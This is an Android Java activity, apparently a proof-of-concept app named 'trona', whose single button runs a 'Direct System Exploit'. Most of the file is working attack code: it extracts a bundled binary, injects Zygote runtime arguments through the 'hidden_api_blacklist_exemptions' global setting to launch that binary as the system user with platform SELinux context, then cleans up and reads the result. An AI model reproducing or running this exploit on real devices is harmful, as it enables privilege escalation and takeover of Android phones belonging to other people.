package com.example.trona;

import android.app.Activity;
import android.os.Bundle;
import android.provider.Settings;
import android.view.View;
import android.widget.Button;
import android.widget.LinearLayout;
import android.widget.ScrollView;
import android.widget.TextView;

import java.io.BufferedReader;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;

public class MainActivity extends Activity {

    private TextView outputView;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        LinearLayout layout = new LinearLayout(this);
        layout.setOrientation(LinearLayout.VERTICAL);
        layout.setPadding(32, 32, 32, 32);

        Button btnExploit = new Button(this);
        btnExploit.setText("Run Direct System Exploit");
        btnExploit.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                runDirectExploit();
            }
        });
        layout.addView(btnExploit);

        outputView = new TextView(this);
        outputView.setText("Ready to launch...\n");
        outputView.setTextIsSelectable(true);
        outputView.setTextColor(0xFF00FF00); // Terminal green
        outputView.setBackgroundColor(0xFF000000); // Black background
        outputView.setPadding(16, 16, 16, 16);

        ScrollView scroll = new ScrollView(this);
        scroll.addView(outputView);
        layout.addView(scroll);

        setContentView(layout);
    }

    private void log(String message) {
        runOnUiThread(new Runnable() {
            @Override
            public void run() {
                outputView.append(message + "\n");
            }
        });
    }

    private void runDirectExploit() {
        outputView.setText("");
        log("Preparing binary and log files...");

        new Thread(new Runnable() {
            @Override
            public void run() {
                try {
                    // 1. Extract trona binary to app's private files dir
                    File outFile = new File(getFilesDir(), "trona");
                    File logFile = new File(getFilesDir(), "exploit_output.txt");
                    
                    if (logFile.exists()) {
                        logFile.delete();
                    }

                    if (!outFile.exists()) {
                        InputStream in = getAssets().open("trona");
                        OutputStream out = new FileOutputStream(outFile);
                        byte[] buffer = new byte[1024];
                        int read;
                        while ((read = in.read(buffer)) != -1) {
                            out.write(buffer, 0, read);
                        }
                        in.close();
                        out.close();
                        log("Binary extracted.");
                    }
                    outFile.setExecutable(true, false);

                    // 2. Craft payload to invoke trona directly and pipe output to our log file
                    String targetCmd = outFile.getAbsolutePath() + " > " + logFile.getAbsolutePath() + " 2>&1";
                    String exploitPayload = "LClass1;->method1( 10 --runtime-args --setuid=1000 --setgid=1000 --runtime-flags=2049 --mount-external-full --setgroups=3003 --nice-name=tronaexec --seinfo=platform:targetSdkVersion=28:complete --invoke-with sh -c \"" + targetCmd + "\"; ";

                    log("Injecting direct Zygote payload...");
                    Settings.Global.putString(
                        getContentResolver(),
                        "hidden_api_blacklist_exemptions",
                        exploitPayload
                    );
                    
                    Thread.sleep(1500);

                    // 3. Clean up settings to prevent bootloops
                    Settings.Global.putString(
                        getContentResolver(),
                        "hidden_api_blacklist_exemptions",
                        ""
                    );
                    log("Settings cleaned up. Reading output log...");

                    Thread.sleep(1000);

                    // 4. Read back the results generated by trona
                    if (logFile.exists()) {
                        BufferedReader reader = new BufferedReader(new InputStreamReader(new FileInputStream(logFile)));
                        String line;
                        while ((line = reader.readLine()) != null) {
                            log(line);
                        }
                        reader.close();
                    } else {
                        log("Log file not found. Execution may have failed.");
                    }

                    // 5. Check SELinux status
                    checkSelinuxStatus();

                } catch (Exception e) {
                    e.printStackTrace();
                    log("Error: " + e.getMessage());
                }
            }
        }).start();
    }

    private void checkSelinuxStatus() {
        log("\n--- Checking SELinux Status ---");
        try {
            Process process = new ProcessBuilder("sh", "-c", "getenforce").redirectErrorStream(true).start();
            BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
            String line;
            while ((line = reader.readLine()) != null) {
                log("SELinux: " + line);
            }
            process.waitFor();
        } catch (Exception e) {
            log("Could not check SELinux: " + e.getMessage());
        }
    }
}
